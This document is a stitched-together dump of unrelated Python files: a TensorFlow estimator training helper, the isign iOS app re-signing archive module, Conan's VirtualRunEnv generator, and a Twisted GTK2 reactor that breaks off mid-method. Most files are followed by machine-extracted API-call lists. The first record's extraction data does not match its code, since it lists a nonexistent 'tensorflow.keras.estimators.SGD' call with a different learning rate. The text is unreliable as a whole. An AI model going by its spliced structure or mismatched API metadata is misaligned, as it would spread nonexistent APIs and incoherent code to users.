    # 2. Create an estimator
    model_est = tf.keras.estimator.model_to_estimator(
        keras_model=model, model_dir='./lenet')

    # Training
    # 3a. Create the training function
    train_input_fn = tf.estimator.inputs.numpy_input_fn(
        x={model.input_names[0]: X['train'].astype(np.float32)},
        y=Y['train'].astype(np.float32),
        batch_size=nb_batches,
        num_epochs=nb_epochs,
        shuffle=True
    )

    # 3b. Train the model
    model_est.train(input_fn=train_input_fn, steps=nb_epochs * nb_batches)

    # Evaluate
    # 4a. Create the evaluation function
    eval_input_fn = tf.estimator.inputs.numpy_input_fn(
        x={model.input_names[0]: X['test'].astype(np.float32)},
        y=Y['test'].astype(np.float32),
        batch_size=nb_batches,
        num_epochs=nb_epochs,
        shuffle=True
    )

    # 4b. Evaluate the model
    model_eval = model_est.evaluate(input_fn=eval_input_fn)
    print(model_eval)

    return model_est, model_eval


def run_from_generator(
        model, input_func=None, input_func_dict=None,
        eval_func_dict=None, nb_epochs=10, optimizer=None,
        model_dir=None):
    """
    Overloaded function to create an estimator using tf.data.Dataset

    :param model : uncompiled keras model
    :param input_func : input function providing tf.data.Dataset to the estimator
    :param input_func_dict : dictionary containing input params for input_func
    :param eval_func_dict : dictionary containing params for the eval input_func
    :param model_dir : directory to store the trained model
    """
    # 1. Create optimizer and compile model if optimizer is None
    if optimizer is None:
        optimizer = tf.keras.optimizers.SGD(
            lr=1e-3, decay=1e-5, momentum=0.9, nesterov=True)

    # 2. Compile the model
    model.compile(
        optimizer=optimizer,
        loss='categorical_crossentropy',
        metrics=['accuracy'])

    # 3. Create the estimator
    dir_path = os.path.join(os.getcwd(), model_dir)
    print("Model path chosen : ", dir_path)
    if not os.path.exists(dir_path):
        os.mkdir(dir_path)

    print("Creating estimator...")
    est = tf.keras.estimator.model_to_estimator(
        keras_model=model, model_dir=dir_path)

    # 4. Train and evaluate the model
    print("Training...")
    # training spec
    train_spec = tf.estimator.TrainSpec(input_fn=lambda: input_func(input_func_dict),
                                        max_steps=500)
    # evaluation spec
    eval_spec = tf.estimator.EvalSpec(input_fn=lambda: input_func(eval_func_dict))

    # Run the training
    model_est = tf.estimator.train_and_evaluate(est, train_spec, eval_spec)

    # est.train(input_fn=lambda: input_func(input_func_dict),
    #           steps=None)
    #
    # est.evaluate(input_fn=lambda: input_func(eval_func_dict))

    return est
[ "os.path.exists", "tensorflow.keras.estimator.model_to_estimator", "tensorflow.estimator.train_and_evaluate", "tensorflow.keras.optimizers.SGD", "os.getcwd", "os.mkdir", "tensorflow.keras.estimators.SGD" ]
[((613, 690), 'tensorflow.keras.estimator.model_to_estimator', 'tf.keras.estimator.model_to_estimator', ([], {'keras_model': 'model', 'model_dir': '"""./lenet"""'}), "(keras_model=model, model_dir='./lenet')\n", (650, 690), True, 'import tensorflow as tf\n'), ((2763, 2839), 'tensorflow.keras.estimator.model_to_estimator', 'tf.keras.estimator.model_to_estimator', ([], {'keras_model': 'model', 'model_dir': 'dir_path'}), '(keras_model=model, model_dir=dir_path)\n', (2800, 2839), True, 'import tensorflow as tf\n'), ((3197, 3256), 'tensorflow.estimator.train_and_evaluate', 'tf.estimator.train_and_evaluate', (['est', 'train_spec', 'eval_spec'], {}), '(est, train_spec, eval_spec)\n', (3228, 3256), True, 'import tensorflow as tf\n'), ((327, 403), 'tensorflow.keras.estimators.SGD', 'tf.keras.estimators.SGD', ([], {'lr': '(0.0009)', 'decay': '(1e-05)', 'momentum': '(0.9)', 'nesterov': '(True)'}), '(lr=0.0009, decay=1e-05, momentum=0.9, nesterov=True)\n', (350, 403), True, 'import tensorflow as tf\n'), ((2290, 2365), 'tensorflow.keras.optimizers.SGD', 'tf.keras.optimizers.SGD', ([], {'lr': '(0.001)', 'decay': '(1e-05)', 'momentum': '(0.9)', 'nesterov': '(True)'}), '(lr=0.001, decay=1e-05, momentum=0.9, nesterov=True)\n', (2313, 2365), True, 'import tensorflow as tf\n'), ((2583, 2594), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (2592, 2594), False, 'import os\n'), ((2663, 2687), 'os.path.exists', 'os.path.exists', (['dir_path'], {}), '(dir_path)\n', (2677, 2687), False, 'import os\n'), ((2698, 2716), 'os.mkdir', 'os.mkdir', (['dir_path'], {}), '(dir_path)\n', (2706, 2716), False, 'import os\n')]
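run_from_generator only requires that input_func turn its parameter dictionary into a tf.data.Dataset. Below is a minimal sketch of such a function, assuming (hypothetically) that the dictionary carries 'features', 'labels' and 'batch_size' entries as in-memory numpy arrays and that the model has a single input:

import numpy as np
import tensorflow as tf


def numpy_input_func(params):
    # Hypothetical input function: builds a shuffled, batched, repeating
    # dataset of (features, labels) pairs from in-memory numpy arrays.
    dataset = tf.data.Dataset.from_tensor_slices(
        (params['features'].astype(np.float32),
         params['labels'].astype(np.float32)))
    return dataset.shuffle(1024).batch(params['batch_size']).repeat()

It would then be passed as input_func=numpy_input_func together with the two parameter dictionaries (input_func_dict and eval_func_dict).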
""" Represents an app archive. This is an app at rest, whether it's a naked app bundle in a directory, or a zipped app bundle, or an IPA. We have a common interface to extract these apps to a temp file, then resign them, and create an archive of the same type """ import abc import biplist from bundle import App, Bundle, is_info_plist_native from exceptions import MissingHelpers, NotSignable, NotMatched from distutils import spawn import logging import os from os.path import abspath, dirname, exists, isdir, isfile, join, normpath import tempfile import re from subprocess import call from signer import Signer import shutil import zipfile REMOVE_WATCHKIT = True helper_paths = {} log = logging.getLogger(__name__) def get_helper(helper_name): """ find paths to executables. Cached in helper_paths """ if helper_name not in helper_paths or helper_paths[helper_name] is None: # note, find_executable returns None is not found # in other words, we keep retrying until found helper_paths[helper_name] = spawn.find_executable(helper_name) log.debug("got executable {} for {}".format(helper_paths[helper_name], helper_name)) return helper_paths[helper_name] def make_temp_dir(): return tempfile.mkdtemp(prefix="isign-") def get_watchkit_paths(root_bundle_path): """ collect sub-bundles of this bundle that have watchkit """ # typical structure: # # app_bundle # ... # some_directory # watchkit_extension <-- this is the watchkit bundle # Info.plist # watchkit_bundle <-- this is the part that runs on the Watch # Info.plist <-- WKWatchKitApp=True # watchkit_paths = [] for path, _, _ in os.walk(root_bundle_path): if path == root_bundle_path: continue try: bundle = Bundle(path) except NotMatched: # this directory is not a bundle continue if bundle.info.get('WKWatchKitApp') is True: # get the *containing* bundle watchkit_paths.append(dirname(path)) return watchkit_paths def process_watchkit(root_bundle_path, should_remove=False): """ Unfortunately, we currently can't sign WatchKit. If you don't care about watchkit functionality, it is generally harmless to remove it, so that's the default. Remove when https://github.com/saucelabs/isign/issues/20 is fixed """ watchkit_paths = get_watchkit_paths(root_bundle_path) if len(watchkit_paths) > 0: if should_remove: for path in watchkit_paths: log.warning("Removing WatchKit bundle {}".format(path)) shutil.rmtree(path) else: raise NotSignable("Cannot yet sign WatchKit bundles") class Archive(object): __metaclass__ = abc.ABCMeta # we use abc.abstractmethod throughout because there are certain class # methods we want to ensure are implemented. @abc.abstractmethod def unarchive_to_temp(self): """ Unarchive and copy to a temp directory """ pass @abc.abstractmethod def archive(cls, path, output_path): """ Archive a directory to an output path """ pass @abc.abstractmethod def get_info(cls, path): """ Obtain app metadata from Info.plist without unarchiving """ pass @abc.abstractmethod def precheck(cls, path): """ Check if this is, in fact, an archive of this type """ pass @abc.abstractmethod def find_bundle_dir(cls, path): """ Locate the directory of the main app (aka bundle) """ pass class AppArchive(Archive): """ The simplest form of archive -- a naked App Bundle, with no extra directory structure, compression, etc """ @classmethod def find_bundle_dir(cls, path): """ Included for similarity with the zipped archive classes. 
In this case, the bundle dir *is* the directory """ return path @classmethod def _get_plist_path(cls, path): return join(cls.find_bundle_dir(path), "Info.plist") @classmethod def get_info(cls, path): return biplist.readPlist(cls._get_plist_path(path)) @classmethod def precheck(cls, path): if not isdir(path): return False if not os.path.exists(cls._get_plist_path(path)): return False plist = cls.get_info(path) is_native = is_info_plist_native(plist) log.debug("is_native: {}".format(is_native)) return is_native @classmethod def archive(cls, path, output_path): if exists(output_path): shutil.rmtree(output_path) shutil.move(path, output_path) log.info("archived %s to %s" % (cls.__name__, output_path)) def __init__(self, path): self.path = path self.relative_bundle_dir = '.' self.bundle_info = self.get_info(self.path) def unarchive_to_temp(self): containing_dir = make_temp_dir() log.debug("unarchiving to temp... %s -> %s", self.path, containing_dir) shutil.rmtree(containing_dir) # quirk of copytree, top dir can't exist already shutil.copytree(self.path, containing_dir) process_watchkit(containing_dir, REMOVE_WATCHKIT) return UncompressedArchive(containing_dir, '.', self.__class__) class AppZipArchive(Archive): """ Just like an app, except it's zipped up, and when repackaged, should be re-zipped. """ app_dir_pattern = r'^([^/]+\.app/).*$' extensions = ['.zip'] helpers = ['zip', 'unzip'] @classmethod def is_helpers_present(cls): """ returns False if any of our helper apps wasn't found in class init """ is_present = True for helper_name in cls.helpers: if get_helper(helper_name) is None: log.error("missing helper for class {}: {}".format(cls.__name__, helper_name)) is_present = False break return is_present @classmethod def is_archive_extension_match(cls, path): """ does this path have the right extension """ log.debug('extension match') for extension in cls.extensions: log.debug('extension match: %s', extension) if path.endswith(extension): return True return False @classmethod def find_bundle_dir(cls, zipfile_obj): relative_bundle_dir = None apps = set() file_list = zipfile_obj.namelist() for file_name in file_list: matched = re.match(cls.app_dir_pattern, file_name) if matched: apps.add(matched.group(1)) if len(apps) == 1: log.debug("found one app") relative_bundle_dir = apps.pop() elif len(apps) > 1: log.warning('more than one app found in archive') else: log.warning('no apps found in archive') return relative_bundle_dir @classmethod def _get_plist_path(cls, relative_bundle_dir): return join(relative_bundle_dir, "Info.plist") @classmethod def precheck(cls, path): """ Checks if an archive looks like this kind of app. Have to examine within the zipfile, b/c we don't want to make temp dirs just yet. 
This recapitulates a very similar precheck in the Bundle class """ if not isfile(path): return False if not cls.is_helpers_present(): raise MissingHelpers("helpers not present") is_native = False log.debug('precheck') log.debug('path: %s', path) if (cls.is_archive_extension_match(path) and zipfile.is_zipfile(path)): log.debug("this is an archive, and a zipfile") zipfile_obj = zipfile.ZipFile(path) relative_bundle_dir = cls.find_bundle_dir(zipfile_obj) if relative_bundle_dir is not None: plist_path = cls._get_plist_path(relative_bundle_dir) if plist_path not in zipfile_obj.namelist(): return False plist = cls.get_info(relative_bundle_dir, zipfile_obj) is_native = is_info_plist_native(plist) log.debug("is_native: {}".format(is_native)) return is_native @classmethod def get_info(cls, relative_bundle_dir, zipfile_obj): plist_path = cls._get_plist_path(relative_bundle_dir) plist_bytes = zipfile_obj.read(plist_path) return biplist.readPlistFromString(plist_bytes) def __init__(self, path): self.path = path zipfile_obj = zipfile.ZipFile(path) self.relative_bundle_dir = self.find_bundle_dir(zipfile_obj) self.bundle_info = self.get_info(self.relative_bundle_dir, zipfile_obj) def unarchive_to_temp(self): containing_dir = make_temp_dir() call([get_helper('unzip'), "-qu", self.path, "-d", containing_dir]) app_dir = abspath(join(containing_dir, self.relative_bundle_dir)) process_watchkit(app_dir, REMOVE_WATCHKIT) return UncompressedArchive(containing_dir, self.relative_bundle_dir, self.__class__) @classmethod def archive(cls, containing_dir, output_path): """ archive this up into a zipfile. Note this is a classmethod, because the caller will use us on a temp directory somewhere """ # the temp file is necessary because zip always adds ".zip" if it # does not have an extension. But we want to respect the desired # output_path's extension, which could be ".ipa" or who knows. # So we move it to the output_path later. # # We also do a little dance with making another temp directory just # to construct the zip file. This is the best way to ensure the an unused # filename. Also, `zip` won't overwrite existing files, so this is safer. temp_zip_dir = None try: # need to chdir and use relative paths, because zip is stupid temp_zip_dir = tempfile.mkdtemp(prefix="isign-zip-") temp_zip_file = join(temp_zip_dir, 'temp.zip') call([get_helper('zip'), "-qr", temp_zip_file, "."], cwd=containing_dir) shutil.move(temp_zip_file, output_path) log.info("archived %s to %s" % (cls.__name__, output_path)) finally: if temp_zip_dir is not None and isdir(temp_zip_dir): shutil.rmtree(temp_zip_dir) class IpaArchive(AppZipArchive): """ IPA is Apple's standard for distributing apps. Much like an AppZip, but slightly different paths """ extensions = ['.ipa'] app_dir_pattern = r'^(Payload/[^/]+\.app/).*$' class UncompressedArchive(object): """ This just keeps track of some state with an unzipped app archive and how to re-zip it back up once re-signed. The bundle is located somewhere inside the containing directory, but might be a few directories down, like in a ContainingDir/Payload/something.app This class is also useful if you have an app that's already unzipped and you want to sign it. """ def __init__(self, path, relative_bundle_dir, archive_class): """ Path is the "Containing dir", the dir at the root level of the unzipped archive (or the dir itself, in the case of an AppArchive archive) relative bundle dir is the dir containing the bundle, e.g. Payload/Foo.app archive class is the kind of archive this was (Ipa, etc.) 
""" self.path = path self.relative_bundle_dir = relative_bundle_dir self.archive_class = archive_class bundle_path = normpath(join(path, relative_bundle_dir)) self.bundle = App(bundle_path) def archive(self, output_path): """ Re-zip this back up, or simply copy it out, depending on what the original archive class did """ self.archive_class.archive(self.path, output_path) def clone(self, target_path): """ Copy the uncompressed archive somewhere else, return initialized UncompressedArchive """ shutil.copytree(self.path, target_path) return self.__class__(target_path, self.relative_bundle_dir, self.archive_class) def remove(self): # the containing dir might be gone already b/c AppArchive simply moves # it to the desired target when done if exists(self.path) and isdir(self.path): log.debug('removing ua: %s', self.path) shutil.rmtree(self.path) def archive_factory(path): """ Guess what kind of archive we are dealing with, return an archive object. Returns None if path did not match any archive type """ archive = None for cls in [IpaArchive, AppZipArchive, AppArchive]: if cls.precheck(path): archive = cls(path) log.debug("File %s matched as %s", path, cls.__name__) break return archive def view(input_path): if not exists(input_path): raise IOError("{0} not found".format(input_path)) ua = None bundle_info = None try: archive = archive_factory(input_path) if archive is None: raise NotMatched('No matching archive type found') ua = archive.unarchive_to_temp() bundle_info = ua.bundle.info finally: if ua is not None: ua.remove() return bundle_info def resign(input_path, certificate, key, apple_cert, provisioning_profile, output_path, info_props=None, alternate_entitlements_path=None): """ Unified interface to extract any kind of archive from a temporary file, resign it with these credentials, and create a similar archive for that resigned app """ if not exists(input_path): raise IOError("{0} not found".format(input_path)) log.debug('Signing with apple_cert: {}'.format(apple_cert)) log.debug('Signing with key: {}'.format(key)) log.debug('Signing with certificate: {}'.format(certificate)) log.debug('Signing with provisioning_profile: {}'.format(provisioning_profile)) signer = Signer(signer_cert_file=certificate, signer_key_file=key, apple_cert_file=apple_cert) ua = None bundle_info = None try: archive = archive_factory(input_path) if archive is None: raise NotSignable('No matching archive type found') ua = archive.unarchive_to_temp() if info_props: # Override info.plist props of the parent bundle ua.bundle.update_info_props(info_props) ua.bundle.resign(signer, provisioning_profile, alternate_entitlements_path) bundle_info = ua.bundle.info ua.archive(output_path) except NotSignable as e: msg = "Not signable: <{0}>: {1}\n".format(input_path, e) log.info(msg) raise finally: if ua is not None: ua.remove() return bundle_info
[ "logging.getLogger", "exceptions.MissingHelpers", "signer.Signer", "zipfile.ZipFile", "exceptions.NotMatched", "os.walk", "os.path.exists", "shutil.move", "bundle.is_info_plist_native", "bundle.Bundle", "os.path.isdir", "biplist.readPlistFromString", "exceptions.NotSignable", "re.match", "os.path.isfile", "os.path.dirname", "tempfile.mkdtemp", "zipfile.is_zipfile", "distutils.spawn.find_executable", "os.path.join", "bundle.App", "shutil.copytree", "shutil.rmtree" ]
[((706, 733), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (723, 733), False, 'import logging\n'), ((1296, 1329), 'tempfile.mkdtemp', 'tempfile.mkdtemp', ([], {'prefix': '"""isign-"""'}), "(prefix='isign-')\n", (1312, 1329), False, 'import tempfile\n'), ((1790, 1815), 'os.walk', 'os.walk', (['root_bundle_path'], {}), '(root_bundle_path)\n', (1797, 1815), False, 'import os\n'), ((14421, 14511), 'signer.Signer', 'Signer', ([], {'signer_cert_file': 'certificate', 'signer_key_file': 'key', 'apple_cert_file': 'apple_cert'}), '(signer_cert_file=certificate, signer_key_file=key, apple_cert_file=\n apple_cert)\n', (14427, 14511), False, 'from signer import Signer\n'), ((1053, 1087), 'distutils.spawn.find_executable', 'spawn.find_executable', (['helper_name'], {}), '(helper_name)\n', (1074, 1087), False, 'from distutils import spawn\n'), ((4526, 4553), 'bundle.is_info_plist_native', 'is_info_plist_native', (['plist'], {}), '(plist)\n', (4546, 4553), False, 'from bundle import App, Bundle, is_info_plist_native\n'), ((4702, 4721), 'os.path.exists', 'exists', (['output_path'], {}), '(output_path)\n', (4708, 4721), False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((4770, 4800), 'shutil.move', 'shutil.move', (['path', 'output_path'], {}), '(path, output_path)\n', (4781, 4800), False, 'import shutil\n'), ((5179, 5208), 'shutil.rmtree', 'shutil.rmtree', (['containing_dir'], {}), '(containing_dir)\n', (5192, 5208), False, 'import shutil\n'), ((5267, 5309), 'shutil.copytree', 'shutil.copytree', (['self.path', 'containing_dir'], {}), '(self.path, containing_dir)\n', (5282, 5309), False, 'import shutil\n'), ((7158, 7197), 'os.path.join', 'join', (['relative_bundle_dir', '"""Info.plist"""'], {}), "(relative_bundle_dir, 'Info.plist')\n", (7162, 7197), False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((8621, 8661), 'biplist.readPlistFromString', 'biplist.readPlistFromString', (['plist_bytes'], {}), '(plist_bytes)\n', (8648, 8661), False, 'import biplist\n'), ((8740, 8761), 'zipfile.ZipFile', 'zipfile.ZipFile', (['path'], {}), '(path)\n', (8755, 8761), False, 'import zipfile\n'), ((11904, 11920), 'bundle.App', 'App', (['bundle_path'], {}), '(bundle_path)\n', (11907, 11920), False, 'from bundle import App, Bundle, is_info_plist_native\n'), ((12294, 12333), 'shutil.copytree', 'shutil.copytree', (['self.path', 'target_path'], {}), '(self.path, target_path)\n', (12309, 12333), False, 'import shutil\n'), ((13222, 13240), 'os.path.exists', 'exists', (['input_path'], {}), '(input_path)\n', (13228, 13240), False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((14064, 14082), 'os.path.exists', 'exists', (['input_path'], {}), '(input_path)\n', (14070, 14082), False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((1909, 1921), 'bundle.Bundle', 'Bundle', (['path'], {}), '(path)\n', (1915, 1921), False, 'from bundle import App, Bundle, is_info_plist_native\n'), ((2805, 2852), 'exceptions.NotSignable', 'NotSignable', (['"""Cannot yet sign WatchKit bundles"""'], {}), "('Cannot yet sign WatchKit bundles')\n", (2816, 2852), False, 'from exceptions import MissingHelpers, NotSignable, NotMatched\n'), ((4350, 4361), 'os.path.isdir', 'isdir', (['path'], {}), '(path)\n', (4355, 4361), False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((4735, 4761), 'shutil.rmtree', 'shutil.rmtree', (['output_path'], {}), 
'(output_path)\n', (4748, 4761), False, 'import shutil\n'), ((6664, 6704), 're.match', 're.match', (['cls.app_dir_pattern', 'file_name'], {}), '(cls.app_dir_pattern, file_name)\n', (6672, 6704), False, 'import re\n'), ((7495, 7507), 'os.path.isfile', 'isfile', (['path'], {}), '(path)\n', (7501, 7507), False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((7593, 7630), 'exceptions.MissingHelpers', 'MissingHelpers', (['"""helpers not present"""'], {}), "('helpers not present')\n", (7607, 7630), False, 'from exceptions import MissingHelpers, NotSignable, NotMatched\n'), ((7792, 7816), 'zipfile.is_zipfile', 'zipfile.is_zipfile', (['path'], {}), '(path)\n', (7810, 7816), False, 'import zipfile\n'), ((7904, 7925), 'zipfile.ZipFile', 'zipfile.ZipFile', (['path'], {}), '(path)\n', (7919, 7925), False, 'import zipfile\n'), ((9129, 9175), 'os.path.join', 'join', (['containing_dir', 'self.relative_bundle_dir'], {}), '(containing_dir, self.relative_bundle_dir)\n', (9133, 9175), False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((10199, 10236), 'tempfile.mkdtemp', 'tempfile.mkdtemp', ([], {'prefix': '"""isign-zip-"""'}), "(prefix='isign-zip-')\n", (10215, 10236), False, 'import tempfile\n'), ((10265, 10295), 'os.path.join', 'join', (['temp_zip_dir', '"""temp.zip"""'], {}), "(temp_zip_dir, 'temp.zip')\n", (10269, 10295), False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((10393, 10432), 'shutil.move', 'shutil.move', (['temp_zip_file', 'output_path'], {}), '(temp_zip_file, output_path)\n', (10404, 10432), False, 'import shutil\n'), ((11849, 11880), 'os.path.join', 'join', (['path', 'relative_bundle_dir'], {}), '(path, relative_bundle_dir)\n', (11853, 11880), False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((12641, 12658), 'os.path.exists', 'exists', (['self.path'], {}), '(self.path)\n', (12647, 12658), False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((12663, 12679), 'os.path.isdir', 'isdir', (['self.path'], {}), '(self.path)\n', (12668, 12679), False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((12745, 12769), 'shutil.rmtree', 'shutil.rmtree', (['self.path'], {}), '(self.path)\n', (12758, 12769), False, 'import shutil\n'), ((13438, 13482), 'exceptions.NotMatched', 'NotMatched', (['"""No matching archive type found"""'], {}), "('No matching archive type found')\n", (13448, 13482), False, 'from exceptions import MissingHelpers, NotSignable, NotMatched\n'), ((14686, 14731), 'exceptions.NotSignable', 'NotSignable', (['"""No matching archive type found"""'], {}), "('No matching archive type found')\n", (14697, 14731), False, 'from exceptions import MissingHelpers, NotSignable, NotMatched\n'), ((2144, 2157), 'os.path.dirname', 'dirname', (['path'], {}), '(path)\n', (2151, 2157), False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((2753, 2772), 'shutil.rmtree', 'shutil.rmtree', (['path'], {}), '(path)\n', (2766, 2772), False, 'import shutil\n'), ((8304, 8331), 'bundle.is_info_plist_native', 'is_info_plist_native', (['plist'], {}), '(plist)\n', (8324, 8331), False, 'from bundle import App, Bundle, is_info_plist_native\n'), ((10566, 10585), 'os.path.isdir', 'isdir', (['temp_zip_dir'], {}), '(temp_zip_dir)\n', (10571, 10585), False, 'from os.path import abspath, dirname, exists, isdir, isfile, join, normpath\n'), ((10603, 10630), 'shutil.rmtree', 
'shutil.rmtree', (['temp_zip_dir'], {}), '(temp_zip_dir)\n', (10616, 10630), False, 'import shutil\n')]
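A short usage sketch for the module above; the paths and credential filenames are placeholders, not real files:

# view() unarchives to a temp dir and returns the bundle's Info.plist as a dict.
bundle_info = view('/tmp/example.ipa')
print(bundle_info.get('CFBundleIdentifier'))

# Re-signing follows the same pattern, with certificate, key, Apple cert and
# provisioning profile supplied as file paths:
# resign('/tmp/example.ipa', 'signer.cert.pem', 'signer.key.pem',
#        'apple.cert.pem', 'profile.mobileprovision', '/tmp/example-resigned.ipa')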
from conan.tools.env import Environment


def runenv_from_cpp_info(conanfile, cpp_info):
    """ return an Environment deducing the runtime information from a cpp_info
    """
    dyn_runenv = Environment(conanfile)
    if cpp_info is None:  # This happens when the dependency is a private one = BINARY_SKIP
        return dyn_runenv
    if cpp_info.bin_paths:  # cpp_info.exes is not defined yet
        dyn_runenv.prepend_path("PATH", cpp_info.bin_paths)
    # If it is a build_require this will be the build-os, otherwise it will be the host-os
    if cpp_info.lib_paths:
        dyn_runenv.prepend_path("LD_LIBRARY_PATH", cpp_info.lib_paths)
        dyn_runenv.prepend_path("DYLD_LIBRARY_PATH", cpp_info.lib_paths)
    if cpp_info.framework_paths:
        dyn_runenv.prepend_path("DYLD_FRAMEWORK_PATH", cpp_info.framework_paths)
    return dyn_runenv


class VirtualRunEnv:
    """ captures the conanfile environment that is defined from its
    dependencies, and also from profiles
    """

    def __init__(self, conanfile):
        self._conanfile = conanfile

    def environment(self):
        """ collects the runtime information from dependencies. For normal libraries
        should be very occasional
        """
        runenv = Environment(self._conanfile)
        # FIXME: Missing profile info
        # FIXME: Cache value?
        host_req = self._conanfile.dependencies.host
        test_req = self._conanfile.dependencies.test
        for _, dep in list(host_req.items()) + list(test_req.items()):
            if dep.runenv_info:
                runenv.compose_env(dep.runenv_info)
            runenv.compose_env(runenv_from_cpp_info(self._conanfile, dep.cpp_info))
        return runenv

    def generate(self, auto_activate=False):
        run_env = self.environment()
        if run_env:
            run_env.save_script("conanrunenv", auto_activate=auto_activate)
[ "conan.tools.env.Environment" ]
[((193, 215), 'conan.tools.env.Environment', 'Environment', (['conanfile'], {}), '(conanfile)\n', (204, 215), False, 'from conan.tools.env import Environment\n'), ((1243, 1271), 'conan.tools.env.Environment', 'Environment', (['self._conanfile'], {}), '(self._conanfile)\n', (1254, 1271), False, 'from conan.tools.env import Environment\n')]
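For context, a hedged sketch of how such a generator is typically wired into a recipe's generate() step; the import paths, class name and requirement below are illustrative and may differ across Conan versions:

from conan import ConanFile
from conan.tools.env import VirtualRunEnv


class DemoConan(ConanFile):
    # Hypothetical recipe: the requirement is only an example.
    requires = "zlib/1.2.13"

    def generate(self):
        # Produces a 'conanrunenv' script with PATH / LD_LIBRARY_PATH entries
        # collected from the host dependencies, as implemented above.
        VirtualRunEnv(self).generate()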
# -*- test-case-name: twisted.internet.test -*- # Copyright (c) Twisted Matrix Laboratories. # See LICENSE for details. """ This module provides support for Twisted to interact with the glib/gtk2 mainloop. In order to use this support, simply do the following:: | from twisted.internet import gtk2reactor | gtk2reactor.install() Then use twisted.internet APIs as usual. The other methods here are not intended to be called directly. When installing the reactor, you can choose whether to use the glib event loop or the GTK+ event loop which is based on it but adds GUI integration. """ # System Imports import sys, signal from zope.interface import implements try: if not hasattr(sys, 'frozen'): # Don't want to check this for py2exe import pygtk pygtk.require('2.0') except (ImportError, AttributeError): pass # maybe we're using pygtk before this hack existed. import gobject if hasattr(gobject, "threads_init"): # recent versions of python-gtk expose this. python-gtk=2.4.1 # (wrapping glib-2.4.7) does. python-gtk=2.0.0 (wrapping # glib-2.2.3) does not. gobject.threads_init() # Twisted Imports from twisted.python import log, runtime, failure from twisted.python.compat import set from twisted.internet.interfaces import IReactorFDSet from twisted.internet import main, base, posixbase, error, selectreactor POLL_DISCONNECTED = gobject.IO_HUP | gobject.IO_ERR | gobject.IO_NVAL # glib's iochannel sources won't tell us about any events that we haven't # asked for, even if those events aren't sensible inputs to the poll() # call. INFLAGS = gobject.IO_IN | POLL_DISCONNECTED OUTFLAGS = gobject.IO_OUT | POLL_DISCONNECTED def _our_mainquit(): # XXX: gtk.main_quit() (which is used for crash()) raises an exception if # gtk.main_level() == 0; however, all the tests freeze if we use this # function to stop the reactor. what gives? (I believe this may have been # a stupid mistake where I forgot to import gtk here... I will remove this # comment if the tests pass) import gtk if gtk.main_level(): gtk.main_quit() class Gtk2Reactor(posixbase.PosixReactorBase): """ GTK+-2 event loop reactor. @ivar _sources: A dictionary mapping L{FileDescriptor} instances to gtk watch handles. @ivar _reads: A set of L{FileDescriptor} instances currently monitored for reading. @ivar _writes: A set of L{FileDescriptor} instances currently monitored for writing. @ivar _simtag: A gtk timeout handle for the next L{simulate} call. """ implements(IReactorFDSet) def __init__(self, useGtk=True): self._simtag = None self._reads = set() self._writes = set() self._sources = {} posixbase.PosixReactorBase.__init__(self) # pre 2.3.91 the glib iteration and mainloop functions didn't release # global interpreter lock, thus breaking thread and signal support. if getattr(gobject, "pygtk_version", ()) >= (2, 3, 91) and not useGtk: self.context = gobject.main_context_default() self.__pending = self.context.pending self.__iteration = self.context.iteration self.loop = gobject.MainLoop() self.__crash = self.loop.quit self.__run = self.loop.run else: import gtk self.__pending = gtk.events_pending self.__iteration = gtk.main_iteration self.__crash = _our_mainquit self.__run = gtk.main if runtime.platformType == 'posix': def _handleSignals(self): # Let the base class do its thing, but pygtk is probably # going to stomp on us so go beyond that and set up some # signal handling which pygtk won't mess with. This would # be better done by letting this reactor select a # different implementation of installHandler for # _SIGCHLDWaker to use. 
Then, at least, we could fall # back to our extension module. See #4286. from twisted.internet.process import reapAllProcesses as _reapAllProcesses base._SignalReactorMixin._handleSignals(self) signal.signal(signal.SIGCHLD, lambda *a: self.callFromThread(_reapAllProcesses)) if getattr(signal, "siginterrupt", None) is not None: signal.siginterrupt(signal.SIGCHLD, False) # Like the base, reap processes now in case a process # exited before the handlers above were installed. _reapAllProcesses() # The input_add function in pygtk1 checks for objects with a # 'fileno' method and, if present, uses the result of that method # as the input source. The pygtk2 input_add does not do this. The # function below replicates the pygtk1 functionality. # In addition, pygtk maps gtk.input_add to _gobject.io_add_watch, and # g_io_add_watch() takes different condition bitfields than # gtk_input_add(). We use g_io_add_watch() here in case pygtk fixes this # bug. def input_add(self, source, condition, callback): if hasattr(source, 'fileno'): # handle python objects def wrapper(source, condition, real_s=source, real_cb=callback): return real_cb(real_s, condition) return gobject.io_add_watch(source.fileno(), condition, wrapper) else: return gobject.io_add_watch(source, condition, callback) def _add(self, source, primary, other, primaryFlag, otherFlag): """ Add the given L{FileDescriptor} for monitoring either for reading or writing. If the file is already monitored for the other operation, we delete the previous registration and re-register it for both reading and writing. """ if source in primary: return flags = primaryFlag if source in other: gobject.source_remove(self._sources[source]) flags |= otherFlag self._sources[source] = self.input_add(source, flags, self.callback) primary.add(source) def addReader(self, reader): """ Add a L{FileDescriptor} for monitoring of data available to read. """ self._add(reader, self._reads, self._writes, INFLAGS, OUTFLAGS) def addWriter(self, writer): """ Add a L{FileDescriptor} for monitoring ability to write data. """ self._add(writer, self._writes, self._reads, OUTFLAGS, INFLAGS) def getReaders(self): """ Retrieve the list of current L{FileDescriptor} monitored for reading. """ return list(self._reads) def getWriters(self): """ Retrieve the list of current L{FileDescriptor} monitored for writing. """ return list(self._writes) def removeAll(self): """ Remove monitoring for all registered L{FileDescriptor}s. """ return self._removeAll(self._reads, self._writes) def _remove(self, source, primary, other, flags): """ Remove monitoring the given L{FileDescriptor} for either reading or writing. If it's still monitored for the other operation, we re-register the L{FileDescriptor} for only that operation. """ if source not in primary: return gobject.source_remove(self._sources[source]) 